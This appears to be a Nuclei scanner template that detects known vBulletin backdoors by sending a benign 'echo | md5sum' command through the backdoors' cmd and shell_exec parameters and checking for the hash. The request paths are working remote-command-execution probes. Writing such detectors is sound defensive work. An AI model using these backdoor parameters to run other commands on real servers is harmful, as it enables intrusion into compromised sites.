id: vbulletin-backdoor

info:
  name: vBulletin Backdoor - Detect
  author: MaStErCho
  severity: high
  reference:
    - https://github.com/OWASP/vbscan
    - https://blog.sucuri.net/2017/01/vbulletin-malware-hackers-compete-backdoor-control.html
  metadata:
    max-request: 31
  tags: backdoor,php,vbulletin,rce

flow: http(1) && http(2)

variables:
  num: "999999999"

http:
  - method: GET
    path:
      - '{{BaseURL}}'

    matchers:
      - type: word
        part: body
        words:
          - "content=\"vBulletin"
          - "id=\"vbulletin_css"
          - "clientscript/vbulletin"
          - "vBulletin_init"
        condition: or

  - method: GET
    path:
      - '{{BaseURL}}/faq.php?cmd=echo%20-n%20{{num}}|md5sum'
      - '{{BaseURL}}/forum.php?x=shell_exec&y=echo%20-n%20{{num}}|md5sum'
      - '{{BaseURL}}/{{paths}}/faq.php?cmd=echo%20-n%20{{num}}|md5sum'
      - '{{BaseURL}}/{{paths}}/forum.php?x=shell_exec&y=echo%20-n%20{{num}}|md5sum'
      - '{{paths}}.{{BaseURL}}/faq.php?cmd=echo%20-n%20{{num}}|md5sum'
      - '{{paths}}.{{BaseURL}}/forum.php?x=shell_exec&y=echo%20-n%20{{num}}|md5sum'

    payloads:
      paths:
        - 'boards'
        - 'board'
        - 'forum'
        - 'forums'
        - 'vb'

    stop-at-first-match: true
    host-redirects: true
    max-redirects: 3
    matchers:
      - type: dsl
        dsl:
          - "contains(body, '{{md5(num)}}')"
          - "status_code == 200"
        condition: and
# digest: 4b0a004830460221008fae03721bc314289f2c2baf635511008168b9dff78d584656301f117b647ba9022100d4ef2e2329df1e7fc48757076cdb654deeadfe9ac181ebfe64113af0ef0fa4cb:922c64590222798bb761d5b6d8e72950